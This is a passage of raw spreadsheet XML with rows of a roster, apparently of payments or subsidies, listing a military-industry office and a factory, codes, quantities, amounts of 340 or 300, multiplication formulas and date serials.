        <v>5034</v>
      </c>
      <c r="F2699" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2699" s="14">
        <v>1</v>
      </c>
      <c r="H2699" s="14">
        <v>340</v>
      </c>
      <c r="I2699" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2699" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2699" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2700" ht="23" customHeight="1" spans="1:11">
      <c r="A2700" s="13" t="s">
        <v>7116</v>
      </c>
      <c r="B2700" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2700" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2700" s="14" t="s">
        <v>7117</v>
      </c>
      <c r="E2700" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F2700" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2700" s="14">
        <v>1</v>
      </c>
      <c r="H2700" s="14">
        <v>340</v>
      </c>
      <c r="I2700" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2700" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2700" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2701" ht="23" customHeight="1" spans="1:11">
      <c r="A2701" s="13" t="s">
        <v>7118</v>
      </c>
      <c r="B2701" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2701" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2701" s="14" t="s">
        <v>7119</v>
      </c>
      <c r="E2701" s="14" t="s">
        <v>4174</v>
      </c>
      <c r="F2701" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2701" s="14">
        <v>1</v>
      </c>
      <c r="H2701" s="14">
        <v>340</v>
      </c>
      <c r="I2701" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2701" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2701" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2702" ht="23" customHeight="1" spans="1:11">
      <c r="A2702" s="13" t="s">
        <v>7120</v>
      </c>
      <c r="B2702" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2702" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2702" s="14" t="s">
        <v>7121</v>
      </c>
      <c r="E2702" s="14" t="s">
        <v>3766</v>
      </c>
      <c r="F2702" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2702" s="14">
        <v>1</v>
      </c>
      <c r="H2702" s="14">
        <v>340</v>
      </c>
      <c r="I2702" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2702" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2702" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2703" ht="23" customHeight="1" spans="1:11">
      <c r="A2703" s="13" t="s">
        <v>7122</v>
      </c>
      <c r="B2703" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2703" s="14" t="s">
        <v>7123</v>
      </c>
      <c r="D2703" s="14" t="s">
        <v>7124</v>
      </c>
      <c r="E2703" s="14" t="s">
        <v>7125</v>
      </c>
      <c r="F2703" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2703" s="14">
        <v>1</v>
      </c>
      <c r="H2703" s="14">
        <v>340</v>
      </c>
      <c r="I2703" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2703" s="24">
        <v>45108</v>
      </c>
      <c r="K2703" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2704" ht="23" customHeight="1" spans="1:11">
      <c r="A2704" s="13" t="s">
        <v>7126</v>
      </c>
      <c r="B2704" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2704" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2704" s="14" t="s">
        <v>7128</v>
      </c>
      <c r="E2704" s="14" t="s">
        <v>3311</v>
      </c>
      <c r="F2704" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2704" s="14">
        <v>1</v>
      </c>
      <c r="H2704" s="14">
        <v>340</v>
      </c>
      <c r="I2704" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2704" s="24">
        <v>45108</v>
      </c>
      <c r="K2704" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2705" ht="23" customHeight="1" spans="1:11">
      <c r="A2705" s="13" t="s">
        <v>7129</v>
      </c>
      <c r="B2705" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2705" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2705" s="14" t="s">
        <v>7130</v>
      </c>
      <c r="E2705" s="14" t="s">
        <v>7131</v>
      </c>
      <c r="F2705" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2705" s="14">
        <v>1</v>
      </c>
      <c r="H2705" s="14">
        <v>340</v>
      </c>
      <c r="I2705" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2705" s="24">
        <v>45108</v>
      </c>
      <c r="K2705" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2706" ht="23" customHeight="1" spans="1:11">
      <c r="A2706" s="13" t="s">
        <v>7132</v>
      </c>
      <c r="B2706" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2706" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2706" s="14" t="s">
        <v>7133</v>
      </c>
      <c r="E2706" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F2706" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2706" s="14">
        <v>1</v>
      </c>
      <c r="H2706" s="14">
        <v>340</v>
      </c>
      <c r="I2706" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2706" s="24">
        <v>45108</v>
      </c>
      <c r="K2706" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2707" ht="23" customHeight="1" spans="1:11">
      <c r="A2707" s="13" t="s">
        <v>7134</v>
      </c>
      <c r="B2707" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2707" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2707" s="14" t="s">
        <v>7135</v>
      </c>
      <c r="E2707" s="14" t="s">
        <v>4622</v>
      </c>
      <c r="F2707" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2707" s="14">
        <v>1</v>
      </c>
      <c r="H2707" s="14">
        <v>340</v>
      </c>
      <c r="I2707" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2707" s="24">
        <v>45108</v>
      </c>
      <c r="K2707" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2708" ht="23" customHeight="1" spans="1:11">
      <c r="A2708" s="13" t="s">
        <v>7136</v>
      </c>
      <c r="B2708" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2708" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2708" s="14" t="s">
        <v>7137</v>
      </c>
      <c r="E2708" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F2708" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2708" s="14">
        <v>2</v>
      </c>
      <c r="H2708" s="14">
        <v>300</v>
      </c>
      <c r="I2708" s="14">
        <f t="shared" si="128"/>
        <v>600</v>
      </c>
      <c r="J2708" s="24">
        <v>45108</v>
      </c>
      <c r="K2708" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2709" ht="23" customHeight="1" spans="1:11">
      <c r="A2709" s="13" t="s">
        <v>7138</v>
      </c>
      <c r="B2709" s="14" t="str">
        <f>B2708</f>
        <v>军工办</v>
      </c>
      <c r="C2709" s="14" t="str">
        <f>C2708</f>
        <v>红宇厂</v>
      </c>
      <c r="D2709" s="18" t="s">
        <v>7139</v>
      </c>
      <c r="E2709" s="19" t="s">
        <v>7140</v>
      </c>
      <c r="F2709" s="14">
        <f>F2708</f>
        <v>4113210399</v>
      </c>
      <c r="G2709" s="14"/>
      <c r="H2709" s="14"/>
      <c r="I2709" s="14"/>
      <c r="J2709" s="24"/>
      <c r="K2709" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2710" ht="23" customHeight="1" spans="1:11">
      <c r="A2710" s="13" t="s">
        <v>7141</v>
      </c>
      <c r="B2710" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2710" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2710" s="14" t="s">
        <v>7142</v>
      </c>
      <c r="E2710" s="14" t="s">
        <v>3439</v>
      </c>
      <c r="F2710" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2710" s="14">
        <v>1</v>
      </c>
      <c r="H2710" s="14">
        <v>340</v>
      </c>
      <c r="I2710" s="14">
        <f t="shared" ref="I2710:I2715" si="129">H2710*G2710</f>
        <v>340</v>
      </c>
      <c r="J2710" s="24">
        <v>45108</v>
      </c>
      <c r="K2710" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2711" ht="23" customHeight="1" spans="1:11">
      <c r="A2711" s="13" t="s">
        <v>7143</v>
      </c>
      <c r="B2711" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2711" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2711" s="14" t="s">
        <v>7144</v>
      </c>
      <c r="E2711" s="14" t="s">
        <v>7145</v>
      </c>
      <c r="F2711" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2711" s="14">
        <v>1</v>
      </c>
      <c r="H2711" s="14">
        <v>340</v>
      </c>
      <c r="I2711" s="14">
        <f t="shared" si="129"/>
        <v>340</v>
      </c>
      <c r="J2711" s="24">
        <v>45108</v>
      </c>
      <c r="K2711" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2712" ht="23" customHeight="1" spans="1:11">
      <c r="A2712" s="13" t="s">
        <v>7146</v>
      </c>
      <c r="B2712" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2712" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2712" s="14" t="s">
        <v>7147</v>
      </c>
      <c r="E2712" s="14" t="s">
        <v>7148</v>
      </c>
      <c r="F2712" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2712" s="14">
        <v>1</v>
      </c>
      <c r="H2712" s="14">
        <v>340</v>
      </c>
      <c r="I2712" s="14">
        <f t="shared" si="129"/>
        <v>340</v>
      </c>
      <c r="J2712" s="24">
        <v>45108</v>
      </c>
      <c r="K2712" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2713" ht="23" customHeight="1" spans="1:11">
      <c r="A2713" s="13" t="s">
        <v>7149</v>
      </c>
      <c r="B2713" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2713" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2713" s="14" t="s">
        <v>7150</v>
      </c>
      <c r="E2713" s="14" t="s">
        <v>7151</v>
      </c>
      <c r="F2713" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2713" s="14">
        <v>1</v>
      </c>
      <c r="H2713" s="14">
        <v>340</v>
      </c>
      <c r="I2713" s="14">
        <f t="shared" si="129"/>
        <v>340</v>
      </c>
      <c r="J2713" s="24">
        <v>45108</v>
      </c>
      <c r="K2713" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2714" ht="23" customHeight="1" spans="1:11">
      <c r="A2714" s="13" t="s">
        <v>7152</v>
      </c>
      <c r="B2714" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2714" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2714" s="14" t="s">
        <v>4411</v>
      </c>
      <c r="E2714" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F2714" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2714" s="14">
        <v>1</v>
      </c>
      <c r="H2714" s="14">
        <v>340</v>
      </c>
      <c r="I2714" s="14">
        <f t="shared" si="129"/>
        <v>340</v>
      </c>
      <c r="J2714" s="24">
        <v>45108</v>
      </c>
      <c r="K2714" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2715" ht="23" customHeight="1" spans="1:11">
      <c r="A2715" s="13" t="s">
        <v>7153</v>
      </c>
      <c r="B2715" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2715" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2715" s="14" t="s">
        <v>7154</v>
      </c>
      <c r="E2715" s="14" t="s">
        <v>7155</v>
      </c>
      <c r="F2715" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2715" s="14">
        <v>2</v>
      </c>
      <c r="H2715" s="14">
        <v>300</v>
      </c>
      <c r="I2715" s="14">
        <f t="shared" si="129"/>
        <v>600</v>
      </c>
      <c r="J2715" s="24">
        <v>45108</v>
      </c>
      <c r="K2715" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2716" ht="23" customHeight="1" spans="1:11">
      <c r="A2716" s="13" t="s">
        <v>7156</v>
      </c>
      <c r="B2716" s="14" t="str">
        <f>B2715</f>
        <v>军工办</v>
      </c>
      <c r="C2716" s="14" t="str">
        <f>C2715</f>
        <v>红宇厂</v>
      </c>
      <c r="D2716" s="18" t="s">
        <v>7157</v>
      </c>
      <c r="E2716" s="19" t="s">
        <v>7158</v>
      </c>
      <c r="F2716" s="14">
        <f>F2715</f>
        <v>4113210399</v>
      </c>
      <c r="G2716" s="14"/>
      <c r="H2716" s="14"/>
      <c r="I2716" s="14"/>
      <c r="J2716" s="24"/>
      <c r="K2716" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2717" ht="23" customHeight="1" spans="1:11">
      <c r="A2717" s="13" t="s">
        <v>7159</v>
      </c>
      <c r="B2717" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2717" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2717" s="14" t="s">
        <v>7160</v>
      </c>
      <c r="E2717" s="14" t="s">
        <v>3323</v>
      </c>
      <c r="F2717" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2717" s="14">
        <v>1</v>
      </c>
      <c r="H2717" s="14">
        <v>340</v>
      </c>
      <c r="I2717" s="14">
        <f t="shared" ref="I2717:I2746" si="130">H2717*G2717</f>
        <v>340</v>
      </c>
      <c r="J2717" s="24">
        <v>45108</v>
      </c>
      <c r="K2717" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2718" ht="23" customHeight="1" spans="1:11">
      <c r="A2718" s="13" t="s">
        <v>7161</v>
      </c>
      <c r="B2718" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2718" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2718" s="14" t="s">
        <v>7162</v>
      </c>
      <c r="E2718" s="14" t="s">
        <v>3356</v>
      </c>
      <c r="F2718" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2718" s="14">
        <v>1</v>
      </c>
      <c r="H2718" s="14">
        <v>340</v>
      </c>
      <c r="I2718" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2718" s="24">
        <v>45108</v>
      </c>
      <c r="K2718" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2719" ht="23" customHeight="1" spans="1:11">
      <c r="A2719" s="13" t="s">
        <v>7163</v>
      </c>
      <c r="B2719" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2719" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2719" s="14" t="s">
        <v>7164</v>
      </c>
      <c r="E2719" s="14" t="s">
        <v>3519</v>
      </c>
      <c r="F2719" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2719" s="14">
        <v>1</v>
      </c>
      <c r="H2719" s="14">
        <v>340</v>
      </c>
      <c r="I2719" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2719" s="24">
        <v>45108</v>
      </c>
      <c r="K2719" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2720" ht="23" customHeight="1" spans="1:11">
      <c r="A2720" s="13" t="s">
        <v>7165</v>
      </c>
      <c r="B2720" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2720" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2720" s="14" t="s">
        <v>7166</v>
      </c>
      <c r="E2720" s="14" t="s">
        <v>7145</v>
      </c>
      <c r="F2720" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2720" s="14">
        <v>1</v>
      </c>
      <c r="H2720" s="14">
        <v>340</v>
      </c>
      <c r="I2720" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2720" s="24">
        <v>45108</v>
      </c>
      <c r="K2720" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2721" ht="23" customHeight="1" spans="1:11">
      <c r="A2721" s="13" t="s">
        <v>7167</v>
      </c>
      <c r="B2721" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2721" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2721" s="14" t="s">
        <v>7168</v>
      </c>
      <c r="E2721" s="14" t="s">
        <v>7169</v>
      </c>
      <c r="F2721" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2721" s="14">
        <v>1</v>
      </c>
      <c r="H2721" s="14">
        <v>340</v>
      </c>
      <c r="I2721" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2721" s="24">
        <v>45108</v>
      </c>
      <c r="K2721" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2722" ht="23" customHeight="1" spans="1:11">
      <c r="A2722" s="13" t="s">
        <v>7170</v>
      </c>
      <c r="B2722" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2722" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2722" s="14" t="s">
        <v>7171</v>
      </c>
      <c r="E2722" s="14" t="s">
        <v>3455</v>
      </c>
      <c r="F2722" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2722" s="14">
        <v>1</v>
      </c>
      <c r="H2722" s="14">
        <v>340</v>
      </c>
      <c r="I2722" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2722" s="24">
        <v>45108</v>
      </c>
      <c r="K2722" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2723" ht="23" customHeight="1" spans="1:11">
      <c r="A2723" s="13" t="s">
        <v>7172</v>
      </c>
      <c r="B2723" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2723" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2723" s="14" t="s">
        <v>7173</v>
      </c>
      <c r="E2723" s="14" t="s">
        <v>7145</v>
      </c>
      <c r="F2723" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2723" s="14">
        <v>1</v>
      </c>
      <c r="H2723" s="14">
        <v>340</v>
      </c>
      <c r="I2723" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2723" s="24">
        <v>45108</v>
      </c>
      <c r="K2723" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2724" ht="23" customHeight="1" spans="1:11">
      <c r="A2724" s="13" t="s">
        <v>7174</v>
      </c>
      <c r="B2724" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2724" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2724" s="14" t="s">
        <v>7175</v>
      </c>
      <c r="E2724" s="14" t="s">
        <v>3481</v>
      </c>
      <c r="F2724" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2724" s="14">
        <v>1</v>
      </c>
      <c r="H2724" s="14">
        <v>340</v>
      </c>
      <c r="I2724" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2724" s="24">
        <v>45108</v>
      </c>
      <c r="K2724" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2725" ht="23" customHeight="1" spans="1:11">
      <c r="A2725" s="13" t="s">
        <v>7176</v>
      </c>
      <c r="B2725" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2725" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2725" s="14" t="s">
        <v>7177</v>
      </c>
      <c r="E2725" s="14" t="s">
        <v>3314</v>
      </c>
      <c r="F2725" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2725" s="14">
        <v>1</v>
      </c>
      <c r="H2725" s="14">
        <v>340</v>
      </c>
      <c r="I2725" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2725" s="24">
        <v>45108</v>
      </c>
      <c r="K2725" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2726" ht="23" customHeight="1" spans="1:11">
      <c r="A2726" s="13" t="s">
        <v>7178</v>
      </c>
      <c r="B2726" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2726" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2726" s="14" t="s">
        <v>7179</v>
      </c>
      <c r="E2726" s="14" t="s">
        <v>3326</v>
      </c>
      <c r="F2726" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2726" s="14">
        <v>1</v>
      </c>
      <c r="H2726" s="14">
        <v>340</v>
      </c>
      <c r="I2726" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2726" s="24">
        <v>45108</v>
      </c>
      <c r="K2726" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2727" ht="23" customHeight="1" spans="1:11">
      <c r="A2727" s="13" t="s">
        <v>7180</v>
      </c>
      <c r="B2727" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2727" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2727" s="14" t="s">
        <v>7181</v>
      </c>
      <c r="E2727" s="14" t="s">
        <v>7182</v>
      </c>
      <c r="F2727" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2727" s="14">
        <v>1</v>
      </c>
      <c r="H2727" s="14">
        <v>340</v>
      </c>
      <c r="I2727" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2727" s="24">
        <v>45108</v>
      </c>
      <c r="K2727" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2728" ht="23" customHeight="1" spans="1:11">
      <c r="A2728" s="13" t="s">
        <v>7183</v>
      </c>
      <c r="B2728" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2728" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2728" s="14" t="s">
        <v>7184</v>
      </c>
      <c r="E2728" s="14" t="s">
        <v>7185</v>
      </c>
      <c r="F2728" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2728" s="14">
        <v>1</v>
      </c>
      <c r="H2728" s="14">
        <v>340</v>
      </c>
      <c r="I2728" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2728" s="14">
        <v>45261</v>
      </c>
      <c r="K2728" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2729" ht="23" customHeight="1" spans="1:11">
      <c r="A2729" s="13" t="s">
        <v>7186</v>
      </c>
      <c r="B2729" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2729" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2729" s="14" t="s">
        <v>7187</v>
      </c>
      <c r="E2729" s="14" t="s">
        <v>5251</v>
      </c>
      <c r="F2729" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2729" s="14">
        <v>1</v>
      </c>
      <c r="H2729" s="14">
        <v>340</v>
      </c>
      <c r="I2729" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2729" s="14">
        <v>45261</v>
      </c>
      <c r="K2729" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2730" ht="23" customHeight="1" spans="1:11">
      <c r="A2730" s="13" t="s">
        <v>7188</v>
      </c>
      <c r="B2730" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2730" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2730" s="14" t="s">
        <v>7190</v>
      </c>
      <c r="E2730" s="14" t="s">
        <v>4757</v>
      </c>
      <c r="F2730" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2730" s="14">
        <v>1</v>
      </c>
      <c r="H2730" s="14">
        <v>340</v>
      </c>
      <c r="I2730" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2730" s="14">
        <v>45261</v>
      </c>
      <c r="K2730" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2731" ht="23" customHeight="1" spans="1:11">
      <c r="A2731" s="13" t="s">
        <v>7191</v>
      </c>
      <c r="B2731" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2731" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2731" s="14" t="s">
        <v>7192</v>
      </c>
      <c r="E2731" s="14" t="s">
        <v>4337</v>
      </c>
      <c r="F2731" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2731" s="14">
        <v>1</v>
      </c>
      <c r="H2731" s="14">
        <v>340</v>
      </c>
      <c r="I2731" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2731" s="14">
        <v>45261</v>
      </c>
      <c r="K2731" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2732" ht="23" customHeight="1" spans="1:11">
      <c r="A2732" s="13" t="s">
        <v>7193</v>
      </c>
      <c r="B2732" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2732" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2732" s="14" t="s">
        <v>7194</v>
      </c>
      <c r="E2732" s="14" t="s">
        <v>7195</v>
      </c>
      <c r="F2732" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2732" s="14">
        <v>1</v>
      </c>
      <c r="H2732" s="14">
        <v>340</v>
      </c>
      <c r="I2732" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2732" s="24">
        <v>45108</v>
      </c>
      <c r="K2732" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2733" ht="23" customHeight="1" spans="1:11">
      <c r="A2733" s="13" t="s">
        <v>7196</v>
      </c>
      <c r="B2733" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2733" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2733" s="14" t="s">
        <v>7197</v>
      </c>
      <c r="E2733" s="14" t="s">
        <v>7198</v>
      </c>
      <c r="F2733" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2733" s="14">
        <v>1</v>
      </c>
      <c r="H2733" s="14">
        <v>340</v>
      </c>
      <c r="I2733" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2733" s="14" t="s">
        <v>7199</v>
      </c>
      <c r="K2733" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2734" ht="23" customHeight="1" spans="1:11">
      <c r="A2734" s="13" t="s">
        <v>7200</v>
      </c>
      <c r="B2734" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2734" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2734" s="14" t="s">
        <v>7201</v>
      </c>
      <c r="E2734" s="14" t="s">
        <v>4243</v>
      </c>
      <c r="F2734" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2734" s="14">
        <v>1</v>
      </c>
      <c r="H2734" s="14">
        <v>340</v>
      </c>
      <c r="I2734" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2734" s="14" t="s">
        <v>4856</v>
      </c>
      <c r="K2734" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2735" ht="23" customHeight="1" spans="1:11">
      <c r="A2735" s="13" t="s">
        <v>7202</v>
      </c>
      <c r="B2735" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2735" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2735" s="14" t="s">
        <v>7203</v>
      </c>
      <c r="E2735" s="14" t="s">
        <v>7071</v>
      </c>
      <c r="F2735" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2735" s="14">
        <v>1</v>
      </c>
      <c r="H2735" s="14">
        <v>340</v>
      </c>
      <c r="I2735" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2735" s="14" t="s">
        <v>7199</v>
      </c>
      <c r="K2735" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2736" ht="23" customHeight="1" spans="1:11">
      <c r="A2736" s="13" t="s">
        <v>7204</v>
      </c>
      <c r="B2736" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2736" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2736" s="14" t="s">
        <v>7205</v>
      </c>
      <c r="E2736" s="14" t="s">
        <v>7206</v>
      </c>
      <c r="F2736" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2736" s="14">
        <v>1</v>
      </c>
      <c r="H2736" s="14">
        <v>340</v>
      </c>
      <c r="I2736" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2736" s="24">
        <v>45566</v>
      </c>
      <c r="K2736" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2737" ht="23" customHeight="1" spans="1:11">
      <c r="A2737" s="13" t="s">
        <v>7207</v>
      </c>
      <c r="B2737" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2737" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2737" s="14" t="s">
        <v>7208</v>
      </c>
      <c r="E2737" s="14" t="s">
        <v>7209</v>
      </c>
      <c r="F2737" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2737" s="14">
        <v>1</v>
      </c>
      <c r="H2737" s="14">
        <v>340</v>
      </c>
      <c r="I2737" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2737" s="24">
        <v>45536</v>
      </c>
